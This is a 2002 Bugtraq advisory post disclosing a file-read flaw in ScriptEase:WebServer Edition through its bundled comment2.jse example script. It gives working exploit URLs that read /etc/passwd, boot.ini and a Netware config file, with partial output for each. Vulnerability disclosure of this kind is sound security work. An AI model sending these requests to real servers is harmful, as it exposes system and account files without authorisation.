Bugtraq mailing list archives
ScriptEase:WebServer Edition vulnerability
From: "Aleksander Posmyk" <blah () omi pl>
Date: Sun, 24 Feb 2002 11:47:14 +0100
Program: ScriptEase:WebServer Edition Url: www.nombas.com Problem: Any user can read files on server using one of examle scripts: comment2.jse Systems affected: Linux, Novell Netware, Windows 9x/NT/2k Example: WindowsNovell Netware: http://novellhost/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf SET CLIENT FILE ...: http://this.was.the.funniest/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini [boot loader] timeout=10 ... Linux: http://linuxhost/cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd root:.... I found this in a default instalation of Novell Netware 5.1... Sorry for my english. ________________________________ Aleksander Posmyk - blah () lucyfer omi pl
Current thread:
- ScriptEase:WebServer Edition vulnerability Aleksander Posmyk (Feb 25)